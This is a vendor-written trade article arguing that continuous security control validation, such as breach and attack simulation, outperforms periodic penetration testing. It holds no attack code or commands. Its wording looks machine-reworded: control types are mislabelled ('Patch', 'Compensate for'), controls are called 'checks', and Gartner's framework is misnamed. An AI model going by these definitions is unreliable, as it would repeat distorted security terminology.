Security control validation is a term that is gaining traction in the cyber community. Is it just a buzzword pushed by marketing teams, or does it have practical implications and benefits? To understand the merits of security control validations, it helps to keep in mind how the IT landscape and cyber threats have changed over the past few years, shares Yoni Leitersdof, US CTO at Cymulate.
On the IT front, a lot has happened. Agile development, with its frequent deployments that change systems infrastructure and network connections, the massive and unplanned migration to work from home due to COVID, rapid and widespread cloud adoption, and increased reliance on regard to third party vendors ranging from open source code snippets to productivity or operational application are the main elements that in less than a decade have grown the attack surface exponentially.
Learn more: Ransomware as a Service: Unraveling This Ecosystem
The cybercriminal toolkit has become more professional on the threat landscape side, and malicious hackers now have access to a range of off-the-shelf hacking tools that allow people with limited programming skills to launch effective automated attacks. Additionally, country-level attacks find their way onto the shelves of dark net hacking tool markets. Geopolitical tensions between China and Taiwan, North Korea’s bellicose attitude, and the conflict between Ukraine and Russia are the most glaring potential sources of direct attacks on nation states.
In short, the classic detect-and-response defensive posture that was adequate until just a few years ago now requires additional capabilities.
The second thing to keep in mind is that not all violations are equal. Although technically, anytime unauthorized adversarial access occurs in a system, it qualifies as a breach. Yet the cost and impact of a breach vary widely, ranging from a minor inconvenience to a major disaster that can even result in business shutdown, infrastructure damage, and even personal injury.
What stands between the former and the latter are the security controls, the most effective minimization of damage caused by breaches elements of any environment.
What are security checks?
The U.S. National Institute of Standards and Technology (NIST) defines a security check as: “A prescribed safeguard or countermeasure for an information system or organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements.
There are five types of security controls:
- Preventive: brings together all the measures and solutions intended to block or stop attempts at malicious intrusion or propagation on the network.
- Detective: covers all measures and solutions designed to identify and report attempted or active malicious activities
- Patch: covers all the measures and solutions designed to prevent an attack from spreading
- Deterrent: covers all measures and solutions intended to deter attackers
- Compensate for: covers all measures taken as an alternative when primary controls are not feasible.
In practice, these cover firewalls, antivirus, security gateways, network segmentation, access and privilege policy management, etc. The US Center for Internet Security (CIS) defines 18 critical security checks organizations are encouraged to implement.
The problem with security checks
All of these security controls must be configured to match the organization’s requirements in order to work as intended. No two organizations are the same, and the level of risk appetite, methods of collecting and accessing data, digital infrastructure, compliance requirements, etc. of each organization are different. Yet the tendency to opt for a plug-and-play attitude when adding new security controls is common. Additionally, vendor default configurations are rarely, if ever, tailored to the specifics of the user’s environment.
Which makes things even worse, because TrendMicro Research shows, is that, on average, organizations have 29 active security control solutions, each with hundreds of configurations that need to be updated each time a new deployment takes place.
The lack of time and resources leads to non-optimized configurations which can have dramatic consequences.
It may not detect attacks in progress or attempts because default configurations are generally designed for operational flexibility. As a result, an attacker can take advantage of loose security controls to gain a foothold and spread undetected or unhindered within the network and successfully achieve their objective, or, conversely, it can lead to a proliferation of false alarms which, in turn, drive to alert fatigue, which may end up weakening the safety posture.
So, with limited resources and time constraints, how can a security team streamline the configuration process and focus on what matters most? Security teams need to know precisely which ones are most likely to let an attacker succeed — essentially, security vulnerabilities — and security control validation does just that.
How to validate security controls
Validation of security controls involves running complete sets of simulated attacks, behaving like a hacker but without negative consequences, and measuring the effectiveness of security controls in stopping them.
In other words, it diverts attention from reacting to attackers and hoping to stop them in time to proactively imitating them and shutting down access points and propagation routes before attackers can. use them for nefarious purposes. Just as sports teams constantly practice to be successful in their games, security teams must practice their controls and processes to ensure they prevent and detect malicious behavior.
The classic method of validating security controls was penetration testing. While penetration testing is still a valuable tool, its use is much more limited than before, as it is not suited to today’s fluid environments, infrastructure, and threat landscape. Due to their cost and their interference with regular operations, penetration tests can only be run periodically, once or twice a year. At the current pace, the relevance of its results is short-lived.
Gartner’s recent publication on the Ongoing Threat Exposure Management framework and its five-step program recommends to continuously plan, monitor and reduce your level of risk using validation technologies that trigger priority corrective actions based on the business context, so that leaders understand and commit.
Learn more: The Authentication Problem: Rethinking Passwords
Depending on the extent of validation required by an organization, current security control validation solutions range from Breach and Attack Simulation (BAS), which only verifies internal security controls, to extended security control management platforms. security posture that combine BAS and other solutions such as phishing awareness. , external attack surface management, automated red team, purple team drills, and more all under one glass dashboard panel.
So, validation of security controls is a buzzword for a very good reason. Without validation, security controls can no longer fulfill their functions of minimizing the damage caused by breaches. The difference between adding security controls and validating them is akin to the difference between estimating the correct configuration of security controls and hoping for the best, and actually knowing what they are and tuning them for optimal security coverage. . It shifts focus from reacting to attackers and hoping to stop them in time to proactively imitating them and shutting down access points and propagation routes before attackers can use them for nefarious purposes .